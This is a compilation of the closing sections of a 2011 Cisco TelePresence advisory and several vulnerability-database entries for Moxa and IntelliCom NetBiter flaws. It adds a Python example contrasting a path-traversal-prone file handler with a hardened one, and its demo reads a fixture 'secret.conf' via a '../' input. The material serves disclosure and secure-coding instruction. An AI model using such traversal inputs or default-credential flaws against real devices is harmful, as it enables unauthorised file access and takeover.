THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============
This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. 
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================
Revision 1.0 | 2011-February-23 | Initial public release

Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt.

Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
VAR-201102-0182 CVE-2010-4741 Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201011-0390
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321. An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
VAR-201102-0174 CVE-2010-4733 WebSCADA Multiple Product Weak Password Vulnerabilities CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. Multiple vulnerabilities, including directory traversal, exist in products running on the IntelliCom NetBiter NB100 and NB200 platforms; other products running on these platforms may also be affected. A third party with access to the product could obtain superadmin authority (the top-level NetBiter permission level) and thereby read system files and configuration files. In addition, arbitrary commands may be executed by uploading malicious code. A remote attacker can gain super-administrator access through the web interface.
VAR-201102-0197 CVE-2010-4730 WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. cgi-bin/read.cgi in multiple IntelliCom products running on the IntelliCom NetBiter NB100 and NB200 platforms contains a directory traversal vulnerability.
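The read.cgi flaw is the generic path-traversal pattern: a page name taken from the request is joined to the web root and opened without canonicalising the result, so ".." components walk out of the root. The following Python is an added example, not the NetBiter CGI (whose code is not on this page). It shows the vulnerable join beside a hardened version that resolves the path and verifies it is still inside the root, and builds a throwaway directory tree to exercise both. Function names and the sample files are assumptions made for the illustration. The entry above notes that the traversal needs an authenticated administrator; the check is still required, since a web-application administrator should not be able to read arbitrary files on the host.

```python
# Added example (not NetBiter/read.cgi code): the traversal pattern in a
# "read a page by name" handler, vulnerable and hardened, with a throwaway tree.
# Function names and the sample files are assumptions for this illustration.
import os
import tempfile


def read_page_vulnerable(web_root, page):
    """The flaw class in read.cgi: join the user-supplied name to the root as-is.

    os.path.join never inspects '..', and if `page` is absolute it discards
    `web_root` entirely, so "../etc/x" and "/etc/x" both escape the root.
    """
    with open(os.path.join(web_root, page), "rb") as fh:
        return fh.read()


def safe_join(web_root, page):
    """Canonicalise, then require the result to still sit under web_root.

    realpath() collapses '..' and follows symlinks; commonpath() compares whole
    path components, so a sibling such as "<root>evil" is rejected where a
    naive str.startswith(root) check would wrongly accept it.
    """
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"page {page!r} resolves outside the web root")
    return target


def read_page_hardened(web_root, page):
    """Same handler with the containment check applied before open()."""
    with open(safe_join(web_root, page), "rb") as fh:
        return fh.read()


def build_demo_tree():
    """Constructed fixture: <tmp>/www/index.html (served) and <tmp>/etc/secret.conf
    (must never be reachable through the page parameter). Returns the www path."""
    base = tempfile.mkdtemp()
    www = os.path.join(base, "www")
    os.makedirs(www)
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(www, "index.html"), "wb") as fh:
        fh.write(b"<html>index</html>")
    with open(os.path.join(base, "etc", "secret.conf"), "wb") as fh:
        fh.write(b"admin_password=changeme")
    return www


if __name__ == "__main__":
    www = build_demo_tree()
    print(read_page_vulnerable(www, "../etc/secret.conf"))  # leaks the file
    try:
        read_page_hardened(www, "../etc/secret.conf")
    except PermissionError as exc:
        print("blocked:", exc)
```

Rejecting the request outright (rather than stripping ".." and retrying) is deliberate: a sanitiser that rewrites the name is easy to bypass with encodings the rewrite does not anticipate, whereas a containment check on the resolved path holds regardless of how the input was spelled.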